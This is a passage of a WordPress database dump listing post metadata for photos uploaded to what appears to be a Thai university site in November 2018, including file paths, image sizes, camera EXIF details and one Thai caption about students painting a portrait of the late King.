II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480530474\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"98\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9867, 4455, '_wp_attached_file', '2018/11/67-Bundit-Chotsuwan-copy.jpg'),
(9868, 4455, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/67-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"67-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"67-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"67-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"67-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"67-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480529862\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"108\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9869, 4456, '_wp_attached_file', '2018/11/68-Bundit-Chotsuwan-copy.jpg'),
(9870, 4456, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/68-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"68-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"68-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"68-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"68-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"68-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476559701\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:4:\"0.04\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9871, 4457, '_wp_attached_file', '2018/11/71-Bundit-Chotsuwan-copy.jpg'),
(9872, 4457, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/71-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"71-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"71-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"71-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"71-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"71-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477040951\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9873, 4458, '_wp_attached_file', '2018/11/75-Bundit-Chotsuwan-copy.jpg'),
(9874, 4458, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1174;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/75-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"75-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"75-Bundit-Chotsuwan-copy-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"75-Bundit-Chotsuwan-copy-768x493.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:493;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"75-Bundit-Chotsuwan-copy-1024x658.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:658;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"75-Bundit-Chotsuwan-copy-400x257.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:257;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480530020\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9875, 4459, '_wp_attached_file', '2018/11/87-Bundit-Chotsuwan-copy.jpg'),
(9876, 4459, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/87-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"87-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"87-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"87-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"87-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"87-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477145296\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9877, 4460, '_wp_attached_file', '2018/11/96-Bundit-Chotsuwan-copy.jpg'),
(9878, 4460, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1107;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/96-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"96-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"96-Bundit-Chotsuwan-copy-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"96-Bundit-Chotsuwan-copy-768x523.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"96-Bundit-Chotsuwan-copy-1024x697.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:697;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"96-Bundit-Chotsuwan-copy-400x272.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477852638\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"34\";s:3:\"iso\";s:4:\"2500\";s:13:\"shutter_speed\";s:4:\"0.04\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9879, 4461, '_wp_attached_file', '2018/11/97-Bundit-Chotsuwan-copy.jpg'),
(9880, 4461, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/97-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"97-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"97-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"97-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"97-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"97-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477500607\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9881, 4462, '_wp_attached_file', '2018/11/100-Bundit-Chotsuwan-copy.jpg'),
(9882, 4462, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1085;s:6:\"height\";i:754;s:4:\"file\";s:37:\"2018/11/100-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"100-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"100-Bundit-Chotsuwan-copy-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"100-Bundit-Chotsuwan-copy-768x534.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"100-Bundit-Chotsuwan-copy-1024x712.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:712;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:37:\"100-Bundit-Chotsuwan-copy-400x278.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476826192\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9883, 4473, '_edit_lock', '1554278576:12'),
(9884, 4473, '_edit_last', '3'),
(9885, 4473, '_hide_featured', NULL),
(9886, 4473, '_yoast_wpseo_content_score', '60'),
(9887, 4478, '_edit_lock', '1542265598:3'),
(9888, 4478, '_edit_last', '3'),
(9889, 4478, '_hide_featured', NULL),
(9890, 4478, '_yoast_wpseo_content_score', '60'),
(9891, 4482, '_edit_lock', '1542265049:3'),
(9892, 4482, '_edit_last', '3'),
(9893, 4482, '_hide_featured', NULL),
(9894, 4482, '_yoast_wpseo_content_score', '90'),
(9895, 4485, '_wp_attached_file', '2018/11/5-Chanklang-Kanthong-copy.jpg'),
(9896, 4485, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:37:\"2018/11/5-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"5-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"5-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"5-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"5-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:37:\"5-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9897, 4486, '_wp_attached_file', '2018/11/11-Chanklang-Kanthong-copy.jpg'),
(9898, 4486, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/11-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"11-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"11-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"11-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"11-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"11-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9899, 4487, '_wp_attached_file', '2018/11/14-Chanklang-Kanthong-copy.jpg'),
(9900, 4487, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/14-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"14-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"14-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"14-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"14-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"14-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9901, 4488, '_wp_attached_file', '2018/11/18-Chanklang-Kanthong-copy.jpg'),
(9902, 4488, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/18-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"18-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"18-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"18-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"18-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"18-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:30:\"จันทร์กลาง\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:843:\"นักศึกษาภาควิจิตรศิลป์ คณะสถาปัตยกรรม สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบังเขียนภาพในหลวงหน้าอาคารเรียน พร้อมน้อมนำพระราชดำรัช \"เสียใจได้ แต่ อย่าละเลยหน้าที่\" ที่ท่านเคยตรัสเมื่อเสียพระพี่นาง\rคนที่อยู่ทางนี้ ก็ต้อง ดำเนินชีวิตต่อไปให้ได้ เพื่อระลึกถึงหน้าที่ของเหล่าบรรดานักศึกษา\";s:17:\"created_timestamp\";s:10:\"1477240402\";s:9:\"copyright\";s:62:\"สวสส/จันทร์กลาง กันทอง\";s:12:\"focal_length\";s:2:\"65\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9903, 4490, '_wp_attached_file', '2018/11/19-Chanklang-Kanthong-copy.jpg'),
(9904, 4490, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:681;s:4:\"file\";s:38:\"2018/11/19-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"19-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"19-Chanklang-Kanthong-copy-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"19-Chanklang-Kanthong-copy-768x436.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:436;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"19-Chanklang-Kanthong-copy-1024x581.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:581;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"19-Chanklang-Kanthong-copy-400x227.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478598196\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:6:\"0.0004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9905, 4491, '_wp_attached_file', '2018/11/22-Chanklang-Kanthong-copy.jpg'),
(9906, 4491, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/22-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"22-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"22-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"22-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"22-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"22-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9907, 4492, '_wp_attached_file', '2018/11/25-Chanklang-Kanthong-copy.jpg'),
